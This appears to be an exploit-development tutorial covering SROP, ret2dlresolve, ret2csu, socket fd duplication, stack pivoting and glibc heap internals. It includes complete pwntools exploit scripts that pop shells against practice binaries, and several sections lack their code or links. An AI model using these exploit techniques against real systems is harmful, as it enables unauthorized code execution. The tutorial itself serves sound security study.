A sigreturn is a special type of syscall. The purpose of sigreturn is to return from the signal handler and to clean up the stack frame after a signal has been unblocked.

What this involves is storing all the register values on the stack. Once the signal is unblocked, all the values are popped back in (RSP points to the bottom of the sigreturn frame, this collection of register values).

Exploitation

By leveraging a sigreturn, we can control all register values at once - amazing! Yet this is also a drawback - we can't pick-and-choose registers, so if we don't have a stack leak it'll be hard to set registers like RSP to a workable value. Nevertheless, this is a super powerful technique - especially with limited gadgets.

Using SROP

Source

As with the syscalls, I made the binary using the pwntools ELF features:

from pwn import *

context.arch = 'amd64'
context.os = 'linux'

elf = ELF.from_assembly(
    '''
        mov rdi, 0;
        mov rsi, rsp;
        sub rsi, 8;
        mov rdx, 500;
        syscall;
        ret;
        
        pop rax;
        ret;
    ''', vma=0x41000
)
elf.save('vuln')

It's quite simple - a read syscall, followed by a pop rax; ret gadget. You can't control RDI/RSI/RDX, which you need to pop a shell, so you'll have to use SROP.

Once again, I added /bin/sh to the binary:

echo -en "/bin/bash\x00" >> vuln

Exploitation

First let's plonk down the available gadgets and their location, as well as the location of /bin/sh.

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = process()

BINSH = elf.address + 0x1250
POP_RAX = 0x41018
SYSCALL_RET = 0x41015

From here, I suggest you try the payload yourself. The padding (as you can see in the assembly) is 8 bytes until RIP, then you'll need to trigger a sigreturn, followed by the values of the registers.

The triggering of a sigreturn is easy - sigreturn is syscall 0xf (15), so we just pop that into RAX and call syscall:

payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)

Now the syscall looks at the location of RSP for the register values; we'll have to fake them. They have to be in a specific order, but luckily for us pwntools has a cool feature called a SigreturnFrame() that handles the order for us.

frame = SigreturnFrame()

Now we just need to decide what the register values should be. We want to trigger an execve() syscall, so we'll set the registers to the values we need for that:

frame.rax = 0x3b            # syscall number for execve
frame.rdi = BINSH           # pointer to /bin/sh
frame.rsi = 0x0             # NULL
frame.rdx = 0x0             # NULL

However, in order to trigger this we also have to control RIP and point it back at the syscall gadget, so the execve actually executes:

frame.rip = SYSCALL_RET

We then append it to the payload and send.

payload += bytes(frame)

p.sendline(payload)
p.interactive()

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = process()

BINSH = elf.address + 0x1250
POP_RAX = 0x41018
SYSCALL_RET = 0x41015

frame = SigreturnFrame()
frame.rax = 0x3b            # syscall number for execve
frame.rdi = BINSH           # pointer to /bin/sh
frame.rsi = 0x0             # NULL
frame.rdx = 0x0             # NULL
frame.rip = SYSCALL_RET

payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)
payload += bytes(frame)

p.sendline(payload)
p.interactive()

Exploitation

Source

To display an example program, we will use the example given on the pwntools entry for ret2dlresolve:

#include <unistd.h>
void vuln(void){
    char buf[64];
    read(STDIN_FILENO, buf, 200);
}
int main(int argc, char** argv){
    vuln();
}

Exploitation

pwntools contains a fancy Ret2dlresolvePayload that can automate the majority of our exploit:

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr)             # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)                 # call .plt and dl-resolve() with the correct, calculated reloc_offset

p.sendline(rop.chain())
p.sendline(dlresolve.payload)                # now the read is called and we pass all the relevant structures in

Let's use rop.dump() to break down what's happening.

[DEBUG] PLT 0x8049030 read
[DEBUG] PLT 0x8049040 __libc_start_main
[DEBUG] Symtab: 0x804820c
[DEBUG] Strtab: 0x804825c
[DEBUG] Versym: 0x80482a6
[DEBUG] Jmprel: 0x80482d8
[DEBUG] ElfSym addr: 0x804ce0c
[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00
[DEBUG] Version index addr: 0x8048c26
[DEBUG] Data addr: 0x804ce00
[DEBUG] PLT_INIT: 0x8049020
[*] 0x0000:          b'AAAA' 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
    [...]
    0x004c:        0x8049030 read(0, 0x804ce00)
    0x0050:        0x804921a <adjust @0x5c> pop edi; pop ebp; ret
    0x0054:              0x0 arg0
    0x0058:        0x804ce00 arg1
    0x005c:        0x8049020 [plt_init] system(0x804ce24)
    0x0060:           0x4b44 [dlresolve index]
    0x0064:          b'zaab' <return address>
    0x0068:        0x804ce24 arg0

As we expected - it's a read followed by a call to plt_init with the parameter 0x0804ce24. Our fake structures are being read in at 0x804ce00. The logging at the top tells us where all the structures are placed.

[DEBUG] ElfSym addr: 0x804ce0c
[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00

Now we know where the fake structures are placed. Since I ran the script with the DEBUG parameter, I'll check what gets sent.

00000000  73 79 73 74  65 6d 00 61  63 61 61 61  a4 4b 00 00  │syst│em·a│caaa│·K··│
00000010  00 00 00 00  00 00 00 00  00 00 00 00  00 ce 04 08  │····│····│····│····│
00000020  07 c0 04 00  2f 62 69 6e  2f 73 68 00  0a           │····│/bin│/sh·│·│
0000002d

system is being written to 0x804ce00 - as the debug said the Symbol name addr would be placed
After that, at 0x804ce0c, the Elf32_Sym struct starts. First it contains the table index of that string, which in this case is 0x4ba4 as it is a very long way off the actual table. Next it contains the other values on the struct, but they are irrelevant and so zeroed out.
At 0x804ce1c that Elf32_Rel struct starts; first it contains the address of the system string, 0x0804ce00, then the r_info variable - if you remember this specifies the R_SYM, which is used to link the SYMTAB and the STRTAB.

After all the structures we place the string /bin/sh at 0x804ce24 - which, if you remember, was the argument passed to system when we printed the rop.dump():

0x005c:        0x8049020 [plt_init] system(0x804ce24)

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)     # call .plt and dl-resolve() with the correct, calculated reloc_offset

log.info(rop.dump())

p.sendline(rop.chain())
p.sendline(dlresolve.payload)    # now the read is called and we pass all the relevant structures in

p.interactive()

ret2csu

Controlling registers when gadgets are lacking

ret2csu is a technique for populating registers when there is a lack of gadgets. More information can be found in the , but a summary is as follows:

When an application is dynamically compiled (compiled with libc linked to it), there is a selection of functions it contains to allow the linking. These functions contain within them a selection of gadgets that we can use to populate registers we lack gadgets for, most importantly __libc_csu_init, which contains the following two gadgets:

The second might not look like a gadget, but if you look it calls r15 + rbx*8. The first gadget chain allows us to control both r15 and rbx in that series of huge pop operations, meaning whe can control where the second gadget calls afterwards.

Note it's call qword [r15 + rbx*8], not call qword r15 + rbx*8. This means it'll calculate r15 + rbx*8 then go to that memory address, read it, and call that value. This mean we have to find a memory address that contains where we want to jump.

These gadget chains allow us, despite an apparent lack of gadgets, to populate the RDX and RSI registers (which are important for parameters) via the second gadget, then jump wherever we wish by simply controlling r15 and rbx to workable values.

This means we can potentially pull off syscalls for execve, or populate parameters for functions such as write().

You may wonder why we would do something like this if we're linked to libc - why not just read the GOT? Well, some functions - such as write() - require three parameters (and at least 2), so we would require ret2csu to populate them if there was a lack of gadgets.

Exploitation

Source

Obviously, you can do a ret2plt followed by a ret2libc, but that's really not the point of this. Try calling win(), and to do that you have to populate the register rdx. Try what we've talked about, and then have a look at the answer if you get stuck.

Analysis

We can work out the addresses of the massive chains using r2, and chuck this all into pwntools.

Note I'm not popping RBX, despite the call. This is because RBX ends up being 0 anyway, and you want to mess with the least number of registers you need to to ensure the best success.

Exploitation

Finding a win()

Now we need to find a memory location that has the address of win() written into it so that we can point r15 at it. I'm going to opt to call gets() again instead, and then input the address. The location we input to is a fixed location of our choice, which is reliable. Now we just need to find a location.

To do this, I'll run r2 on the binary then dcu main to contiune until main. Now let's check permissions:

The third location is RW, so let's check it out.

The address 0x404028 appears unused, so I'll write win() there.

Reading in win()

To do this, I'll just use the ROP class.

Popping the registers

Now we have the address written there, let's just get the massive ropchain and plonk it all in

Sending it off

Don't forget to pass a parameter to the gets():

Final Exploit

And we have successfully controlled RDX - without any RDX gadgets!

Simplification

As you probably noticed, we don't need to pop off r12 or r13, so we can move POP_CHAIN a couple of intructions along:

CSU Hardening

As of , the CSU has been hardened to remove the useful gadgets. is the offendor, and it essentially removes __libc_csu_init (as well as a couple other functions) entirely.

Unfortunately, changing this breaks the ABI (application binary interface), meaning that any binaries compiled in this way can not run on pre-2.34 glibc versions - which can make things quite annoying for CTF challenges if you have an outdated glibc version. Older compilations, however, can work on the newer versions.

Exploiting over Sockets

File Descriptors and Sockets

Overview

File Descriptors are integers that represent conections to sockets or files or whatever you're connecting to. In Unix systems, there are 3 main file descriptors (often abbreviated fd) for each application:

These are, as shown above, standard input, output and error. You've probably used them before yourself, for example to hide errors when running commands:

Here you're piping stderr to /dev/null, which is the same principle.

File Descriptors and Sockets

Many binaries in CTFs use programs such as socat to redirect stdin and stdout (and sometimes stderr) to the user when they connect. These are super simple and often require no more than a replacement of

With the line

Others, however, implement their own socket programming in C. In these scenarios, stdin and stdout may not be shown back to the user.

The reason for this is every new connection has a different fd. If you listen in C, since fd 0-2 is reserved, the listening socket will often be assigned fd 3. Once we connect, we set up another fd, fd 4 (neither the 3 nor the 4 is certain, but statistically likely).

Exploitation with File Desciptors

In these scenarios, it's just as simple to pop a shell. This shell, however, is not shown back to the user - it's shown back to the terminal running the server. Why? Because it utilises fd 0, 1 and 2 for its I/O.

Here we have to tell the program to duplicate the file descriptor in order to redirect stdin and stderr to fd 4, and glibc provides a simple way to do so.

The dup syscall (and C function) duplicates the fd and uses the lowest-numbered free fd. However, we need to ensure it's fd 4 that's used, so we can use dup2(). dup2 takes in two parameters: a newfd and an oldfd. Descriptor oldfd is duplicated to newfd, allowing us to interact with stdin and stdout and actually use any shell we may have popped.

Note that the outlines how if newfd is in use it is silently closed, which is exactly what we wish.

Exploit

Duplicating the Descriptors

Source

I'll include source.c, but most of it is socket programming derived from . The two relevent functions - vuln() and win() - I'll list below.

Quite literally an easy .

Exploitation

Start the binary with ./vuln 9001.

Basic setup, except it's a remote process:

Testing Offset

I pass in a basic pattern and pause directly before:

Once the pause() is reached, I hook on with radare2 and set a breakpoint at the ret.

Ok, so the offset is 40.

Generate Exploit

Should be fairly simple, right?

What the hell?

But if we look on the server itself:

A shell was popped there! This is the we talked about before.

So we have a shell, but no way to control it. Time to use dup2.

I've simplified this challenge a lot by including a call to dup2() within the vulnerable binary, but normally you would leak libc via the and then use libc's dup2() rather than the PLT; this walkthrough is about the basics, so I kept it as simple as possible.

Duplicating File Descriptors

As we know, we need to call dup2(newfd, oldfd). newfd will be 4 (our connection fd) and oldfd will be 0 and 1 (we need to call it twice to redirect bothstdin and stdout). Knowing what you do about , have a go at doing this and then caling win(). The answer is below.

Using dup2()

Since we need two parameters, we'll need to find a gadget for RDI and RSI. I'll use ROPgadget to find these.

Plonk these values into the script.

Now to get all the calls to dup2().

And wehey - the file descriptors were successfully duplicated!

Final Exploit

Pwntools' ROP

These kinds of chains are where pwntools' ROP capabilities really come into their own:

Works perfectly and is much shorter and more readable!

Socat

Forking Processes

Flaws with fork()

Some processes use fork() to deal with multiple requests at once, most notably servers.

An interesting side-effect of fork() is that memory is copied exactly. This means everything is identical - ELF base, libc base, canaries.

This "shared" memory is interesting from an attacking point of view as it allows us to do a byte-by-byte bruteforce. Simply put, if there is a response from the server when we send a message, we can work out when it crashed. We keep spamming bytes until there's a response. If the server crashes, the byte is wrong. If not, it's correct.

This allows us to bruteforce the RIP one byte at a time, essentially leaking PIE - and the same thing for canaries and RBP. 24 bytes of multithreaded bruteforce, and once you leak all of those you can bypass a canary, get a stack leak from RBP and PIE base from RIP.

I won't be making a binary for this (yet), but you can check out ippsec's Rope writeup for HTB - Rope root was this exact technique.

Stack Pivoting

Lack of space for ROP

Overview

Stack Pivoting is a technique we use when we lack space on the stack - for example, we have 16 bytes past RIP. In this scenario, we're not able to complete a full ROP chain.

During Stack Pivoting, we take control of the RSP register and "fake" the location of the stack. There are a few ways to do this.

pop rsp gadget

Possibly the simplest, but also the least likely to exist. If there is one of these, you're quite lucky.

xchg <reg>, rsp

If you can find a pop <reg> gadget, you can then use this xchg gadget to swap the values with the ones in RSP. Requires about 16 bytes of stack space after the saved return pointer:

pop <reg>                <=== return pointer
<reg value>
xchg <rag>, rsp

leave; ret

This is a very interesting way of stack pivoting, and it only requires 8 bytes.

Every function (except main) is ended with a leave; ret gadget. leave is equivalent to

mov rsp, rbp
pop rbp

Note that the function ending therefore looks like

mov rsp, rbp
pop rbp
pop rip

That means that when we overwrite RIP the 8 bytes before that overwrite RBP (you may have noticed this before). So, cool - we can overwrite rbp using leave. How does that help us?

Well if we look at leave again, we noticed the value in RBP gets moved to RSP! So if we call overwrite RBP then overwrite RIP with the address of leave; ret again, the value in RBP gets moved to RSP. And, even better, we don't need any more stack space than just overwriting RIP, making it very compressed.

Exploitation

Stack Pivoting

Source

3KB

stack_pivoting.zip

Basic Setup

Just to get the basics out of the way, as this is common to both approaches:

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

pop rsp

Using a pop rsp gadget to stack pivot

Exploitation

Gadgets

FIrst off, let's grab all the gadgets. I'll use ROPgadget again to do so:

$ ROPgadget --binary vuln | grep 'pop rsp'
0x0000000000401225 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret

$ ROPgadget --binary vuln | grep 'pop rdi'
0x000000000040122b : pop rdi ; ret

$ ROPgadget --binary vuln | grep 'pop rsi'
0x0000000000401229 : pop rsi ; pop r15 ; ret

Now we have all the gadgets, let's chuck them into the script:

POP_CHAIN = 0x401225                   # RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

Testing the pop

Let's just make sure the pop works by sending a basic chain and then breaking on ret and stepping through.

payload = flat(
    'A' * 104,
    POP_CHAIN,
    buffer,
    0,            # r13
    0,            # r14
    0             # r15
)

pause()
p.sendline(payload)
print(p.recvline())

If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it off, attach r2.

$r2 -d -A $(pidof vuln)

[0x7f96f01e9dee]> db 0x004011b8
[0x7f96f01e9dee]> dc
hit breakpoint at: 4011b8
[0x004011b8]> pxq @ rsp
0x7ffce2d4fc68  0x0000000000401225  0x00007ffce2d4fc00
0x7ffce2d4fc78  0x0000000000000000  0x00007ffce2d4fd68

You may see that only the gadget + 2 more values were written; this is because our buffer length is limited, and this is the reason we need to stack pivot. Let's step through the first pop.

[0x004011b8]> ds
[0x00401225]> ds
[0x00401226]> dr rsp
0x7ffce2d4fc00

You may notice it's the same as our "leaked" value, so it's working. Now let's try and pop the 0x0 into r13.

[0x00401226]> ds
[0x00401228]> dr r13
0x4141414141414141

What? We passed in 0x0 to the gadget!

Remember, however, that pop r13 is equivalent to mov r13, [rsp] - the value from the top of the stack is moved into r13. Because we moved RSP, the top of the stack moved to our buffer and AAAAAAAA was popped into it - because that's what the top of the stack points to now.

Full Payload

Now we understand the intricasies of the pop, let's just finish the exploit off. To account for the additional pop calls, we have to put some junk at the beginning of the buffer, before we put in the ropchain.

payload = flat(
    0,                 # r13
    0,                 # r14
    0,                 # r15
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,               # r15
    elf.sym['winner']
)

payload = payload.ljust(104, b'A')     # pad to 104

payload += flat(
    POP_CHAIN,
    buffer             # rsp - now stack points to our buffer!
)

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

POP_CHAIN = 0x401225                   # RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

payload = flat(
    0,                 # r13
    0,                 # r14
    0,                 # r15
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,               # r15
    elf.sym['winner']
)

payload = payload.ljust(104, b'A')     # pad to 104

payload += flat(
    POP_CHAIN,
    buffer             # rsp
)

pause()
p.sendline(payload)
print(p.recvline())

leave

Using leave; ret to stack pivot

Exploitation

By calling leave; ret twice, as described, this happens:

mov rsp, rbp
pop rbp
mov rsp, rbp
pop rbp

By controlling the value popped into RBP, we can control RSP.

Gadgets

As before, but with a difference:

$ ROPgadget --binary vuln | grep 'leave'
0x000000000040117c : leave ; ret

LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

Testing the leave

I won't bother stepping through it again - if you want that, check out the pop rsp walkthrough.

payload = flat(
    'A' * 96,
    buffer,
    LEAVE_RET
)

pause()
p.sendline(payload)
print(p.recvline())

Essentially, that pops buffer into RSP (as described previously).

Full Payload

You might be tempted to just chuck the payload into the buffer and boom, RSP points there, but you can't quite - as with the previous approach, there is a pop instruction that needs to be accounted for - again, remember leave is

mov rsp, rbp
pop rbp

So once you overwrite RSP, you still need to give a value for the pop rbp.

payload = flat(
    0x0,               # account for final "pop rbp"
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,               # r15
    elf.sym['winner']
)

payload = payload.ljust(96, b'A')     # pad to 96 (just get to RBP)

payload += flat(
    buffer,
    LEAVE_RET
)

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

payload = flat(
    0x0,               # rbp
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,
    elf.sym['winner']
)

payload = payload.ljust(96, b'A')     # pad to 96 (just get to RBP)

payload += flat(
    buffer,
    LEAVE_RET
)

pause()
p.sendline(payload)
print(p.recvline())

Heap

Still learning :)

Moving onto heap exploitation does not require you to be a god at stack exploitation, but it will require a better understanding of C and how concepts such as pointers work. From time to time we will be discussing the glibc source code itself, and while this can be really overwhelming, it's incredibly good practise.

I'll do everything I can do make it as simple as possible. Most references (to start with) will be hyperlinks, so feel free to just keep the concept in mind for now, but as you progress understanding the source will become more and more important.

Occasionally different snippets of code will be from different glibc versions, and I'll do my best to note down which version they are from. The reason for this is that newer versions have a lot of protections that will obscure the basic logic of the operation, so we will start with older implementations and build up.

Introduction to the Heap

Unlike the stack, heap is an area of memory that can be dynamically allocated. This means that when you need new space, you can "request" more from the heap.

In C, this often means using functions such as malloc() to request the space. However, the heap is very slow and can take up tons of space. This means that the developer has to tell libc when the heap data is "finished with", and it does this via calls to free() which mark the area as available. But where there are humans there will be implementation flaws, and no amount of protection will ever ensure code is completely safe.

In the following sections, we will only discuss 64-bit systems (with the exception of some parts that were written long ago). The theory is the same, but pretty much any heap challenge (or real-world application) will be on 64-bit systems.

Chunks

Internally, every chunk - whether allocated or free - is stored in a malloc_chunk structure. The difference is how the memory space is used.

Allocated Chunks

When space is allocated from the heap using a function such as malloc(), a pointer to a heap address is returned. Every chunk has additional metadata that it has to store in both its used and free states.

The chunk has two sections - the metadata of the chunk (information about the chunk) and the user data, where the data is actually stored.

The size field is the overall size of the chunk, including metadata. It must be a multiple of 8, meaning the last 3 bits of the size are 0. This allows the flags A, M and P to take up that space, with A being the 3rd-last bit of size, M the 2nd-last and P the last.

The flags have special uses:

P is the PREV_INUSE flag, which is set when the previous adjacent chunk (the chunk ahead) is in use
M is the IS_MMAPPED flag, which is set when the chunk is allocated via mmap() rather than a heap mechanism such as malloc()
A is the NON_MAIN_ARENA flag, which is set when the chunk is not located in main_arena; we will get to Arenas in a later section, but in essence every created thread is provided a different arena (up to a limit) and chunks in these arenas have the A bit set

prev_size is set if the previous adjacent chunk is free, as calculated by P being 0. If it is not, the heap saves space and prev_size is part of the previous chunk's user data. If it is, then prev_size stores the size of the previous chunk.

Free Chunks

Free chunks have additional metadata to handle the linking between them.

This can be seen in the malloc_state struct:

struct malloc_chunk {
  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};

Freeing Chunks and the Bins

An Overview of Freeing

When we are done with a chunk's data, the data is freed using a function such as free(). This tells glibc that we are done with this portion of memory.

In the interest of being as efficient as possible, glibc makes a lot of effort to recycle previously-used chunks for future requests in the program. As an example, let's say we need 100 bytes to store a string input by the user. Once we are finished with it, we tell glibc we are no longer going to use it. Later in the program, we have to input another 100-byte string from the user. Why not reuse that same part of memory? There's no reason not to, right?

It is the bins that are responsible for the bulk of this memory recycling. A bin is a (doubly- or singly-linked) list of free chunks. For efficiency, different bins are used for different sizes, and the operations will vary depending on the bins as well to keep high performance.

When a chunk is freed, it is "moved" to the bin. This movement is not physical, but rather a pointer - a reference to the chunk - is stored somewhere in the list.

Bin Operations

There are four bins: fastbins, the unsorted bin, smallbins and largebins.

When a chunk is freed, the function that does the bulk of the work in glibc is _int_free(). I won't delve into the source code right now, but will provide hyperlinks to glibc 2.3, a very old one without security checks. You should have a go at familiarising yourself with what the code says, but bear in mind things have been moved about a bit to get to there they are in the present day! You can change the version on the left in bootlin to see how it's changed.

First, the size of the chunk is checked. If it is less than the largest fastbin size, add it to the correct fastbin
Otherwise, if it's mmapped, munmap the chunk
Finally, consolidate them and put them into the unsorted bin

What is consolidation? We'll be looking into this more concretely later, but it's essentially the process of finding other free chunks around the chunk being freed and combining them into one large chunk. This makes the reuse process more efficient.

Fastbins

Fastbins store small-sized chunks. There are 10 of these for chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80 or 88 bytes including metadata.

Unsorted Bin

There is only one of these. When small and large chunks are freed, they end of in this bin to speed up allocation and deallocation requests.

Essentially, this bin gives the chunks one last shot at being used. Future malloc requests, if smaller than a chunk currently in the bin, split up that chunk into two pieces and return one of them, speeding up the process - this is the Last Remainder Chunk. If the chunk requested is larger, then the chunks in this bin get moved to the respective Small/Large bins.

Small Bins

There are 62 small bins of sizes 16, 24, ... , 504 bytes and, like fast bins, chunks of the same size are stored in the same bins. Small bins are doubly-linked and allocation and deallocation is FIFO.

The purpose of the FD and BK pointers as we saw before are to points to the chunks ahead and behind in the bin.

Before ending up in the unsorted bin, contiguous small chunks (small chunks next to each other in memory) can coalesce (consolidate), meaning their sizes combine and become a bigger chunk.

Large Bins

63 large bins, can store chunks of different sizes. The free chunks are ordered in decreasing order of size, meaning insertions and deletions can occur at any point in the list.

The first 32 bins have a range of 64 bytes:

1st bin: 512 - 568 bytes
2nd bin: 576 - 632 bytes
[...]

Like small chunks, large chunks can coalesce together before ending up in the unsorted bin.

Head and Tail

Each bin is represented by two values, the HEAD and TAIL. As it sounds, HEAD is at the top and TAIL at the bottom. Most insertions happen at the HEAD, so in LIFO structures (such as the fastbins) reallocation occurs there too, whereas in FIFO structures (such as small bins) reallocation occurs at the TAIL. For fastbins, the TAIL is null.

Operations of the Fastbin

Fastbins are a singly-linked list of chunks. The point of these is that very small chunks are reused quickly and efficiently. To aid this, chunks of fastbin size do not consolidate (they are not absorbed into surrounding free chunks once freed).

A fastbin is a LIFO (Last-In-First-Out) structure, which means the last chunk to be added to the bin is the first chunk to come out of it. Glibc only keeps track of the HEAD, which points to the first chunk in the list (and is set to 0 if the fastbin is empty). Every chunk in the fastbin has an fd pointer, which points to the next chunk in the bin (or is 0 if it is the last chunk).

When a new chunk is freed, it's added at the front of the list (making it the head):

The fd of the newly-freed chunk is overwritten to point at the old head of the list
HEAD is updated to point to this new chunk, setting the new chunk as the head of the list

Let's have a visual demonstration (it will help)! Try out the following C program:

#include <stdio.h>
#include <stdlib.h>

int main() {
    char *a = malloc(20);
    char *b = malloc(20);
    char *c = malloc(20);
    
    printf("a: %p\nb: %p\nc: %p\n", a, b, c);

    puts("Freeing...");

    free(a);
    free(b);
    free(c);

    puts("Allocating...");

    char *d = malloc(20);
    char *e = malloc(20);
    char *f = malloc(20);

    printf("d: %p\ne: %p\nf: %p\n", d, e, f);
}

We get:

a: 0x2292010
b: 0x2292030
c: 0x2292050
Freeing...
Allocating...
d: 0x2292050
e: 0x2292030
f: 0x2292010

As you can see, the chunk a gets reassigned to chunk f, b to e and c to d. So, if we free() a chunk, there's a good chance our next malloc() - if it's of the same size - will use the same chunk.

It can be really confusing as to why we add and remove chunks from the start of the list (why not the end?), but it's really just the most efficient way to add an element. Let's say we have this fastbin setup:

HEAD --> a -> b

In this case HEAD points to a, and a points onwards to b as the next chunk in the bin (because the fd field of a points to b). Now let's say we free another chunk c. If we want to add it to the end of the list like so:

HEAD --> a -> b -> c

We would have to update the fd pointer of b to point at c. But remember that glibc only keeps track of the first chunk in the list - it only has the HEAD stored. It has no information about the end of this list, which could be many chunks long. This means that to add c in at the end, it would first have to start at the head and traverse through the entire list until it got to the last chunk, then overwrite the fd field of the last chunk to point at c and make c the last chunk.

Meanwhile, if it adds at the HEAD:

HEAD --> c -> a -> b

All we need to do is:

Set the fd of c to point at a
- This is easy, as a was the old head, so glibc had a pointer to it stored already
HEAD is then updated to c, making it the head of the list
- This is also easy, as the pointer to c is freely available

This has much less overhead!

For reallocating the chunk, the same principle applies - it's much easier to update HEAD to point to a by reading the fd of c than it is to traverse the entire list until it gets to the end.

Operations of the Other Bins

When a non-fast chunk is freed, it gets put into the Unsorted Bin. When new chunks are requested, glibc looks at all of the bins

If the requested size is fastbin size, check the corresponding fastbin
- If there is a chunk in it, return it
If the requested chunk is of smallbin size, check the corresponding smallbin
- If there is a chunk in it, return it
If the requested chunk is large (of largebin size), we first consolidate the largebins with malloc_consolidate(). We will get into the mechanisms of this at a later point, but essentially I lied earlier - fastbins do consolidate, but not on freeing!
Finally, we iterate through the chunks in the unsorted bin
- If it is empty, we service the request through making the heap larger by moving the top chunk back and making space
If the requested size is equal to the size of the chunk in the bin, return the chunk
If it's smaller, split the chunk in the bin in two and return a portion of the correct size
If it's larger,

One thing that is very easy to forget is what happens on allocation and what happens on freeing, as it can be a bit counter-intuitive. For example, the fastbin consolidation is triggered from an allocation!

Malloc State

malloc_consolidate()

Consolidating fastbins

, I said that chunks that went to the unsorted bin would consolidate, but fastbins would not. This is technically not true, but they don't consolidate automatically; in order for them to consolidate, the function has to be called. This function looks complicated, but it essentially just grabs all adjacent fastbin chunks and combines them into larger chunks, placing them in the unsorted bin.

Why do we care? Well, UAFs and the like are very nice to have, but a Read-After-Free on a fastbin chunk can only ever leak you a heap address, as the singly-linked lists only use the fd pointer which points to another chunk (on the heap) or is NULL. We want to get a libc leak as well!

If we free enough adjacent fastbin chunks at once and trigger a call to malloc_consolidate(), they will consolidate to create a chunk that goes to the unsorted bin. The unsorted bin is doubly-linked, and acts accordingly - if it is the only element in the list, both fd and bk will point to a location in malloc_state, which is contained within libc.

This means that the more important thing for us to know is how we can trigger a largebin consolidation.

Some of the most important ways include:

Inputting a very long number into scanf (around 0x400 characters long)
- This works because the code responsible for it manages a scratch_buffer and assigns it 0x400 bytes, but uses malloc when the data is too big (along with realloc if it gets even bigger than the heap chunk, and free at the end, so it works to trigger those functions too - great for triggering hooks!).
Inputting something along the lines of %10000c into a format string vulnerability also triggers a chunk to be created

Both of these work because a largebin allocation triggers malloc_consolidate.By checking the calls to the function in (2.35), we can find other triggers.

It's possible for earlier or later glibc versions to have a greater or lesser number of calls to a specific function, so make sure to check for your version! You may find another way exists.

The most common and most important trigger, a call to malloc() requesting a chunk of largebin size will .

There is another call to it in the section . This section is called when the top chunk has to be used to service the request. The checks if the top chunk is large enough to service the request:

If not, checks if there are fastchunks in the arena. If there are, it calls malloc_consolidate to attempt to regain space to service the request!

So, by filling the heap and requesting another chunk, we can trigger a call to malloc_consolidate().

(If both conditions fail, _int_malloc falls back to esssentially using mmap to service the request).

TODO

Calling will consolidate fastbins (which makes sense, given the name malloc_trim). Unlikely to ever be useful, but please do let me know if you find a use for it!

When changing malloc options using mallopt, . This is pretty useless, as mallopt is likely called once (if at all) in the program prelude before it does anything.

Heap Overflow

Heap Overflow, much like a Stack Overflow, involves too much data being written to the heap. This can result in us overwriting data, most importantly pointers. Overwriting these pointers can cause user input to be copied to different locations if the program blindly trusts data on the heap.

To introduce this (it's easier to understand with an example) I will use two vulnerable binaries from Protostar.

heap0

http://exploit.education/phoenix/heap-zero/

Source

Luckily it gives us the source:

Analysis

So let's analyse what it does:

Allocates two chunks on the heap
Sets the fp variable of chunk f to the address of nowinner
Copies the first command-line argument to the name variable of the chunk d
Runs whatever the fp variable of f points at

The weakness here is clear - it runs a random address on the heap. Our input is copied there after the value is set and there's no bound checking whatsoever, so we can overrun it easily.

Regular Execution

Let's check out the heap in normal conditions.

We'll break right after the strcpy and see how it looks.

If we want, we can check the contents.

So, we can see that the function address is there, after our input in memory. Let's work out the offset.

Working out the Offset

Since we want to work out how many characters we need until the pointer, I'll just use a .

Let's break on and after the strcpy. That way we can check the location of the pointer then immediately read it and calculate the offset.

So, the chunk with the pointer is located at 0x2493060. Let's continue until the next breakpoint.

radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.

Notice we overwrote the size field, so the chunk is much bigger. But now we can easily use the first value to work out the offset (we could also, knowing the location, have done pxq @ 0x02493060).

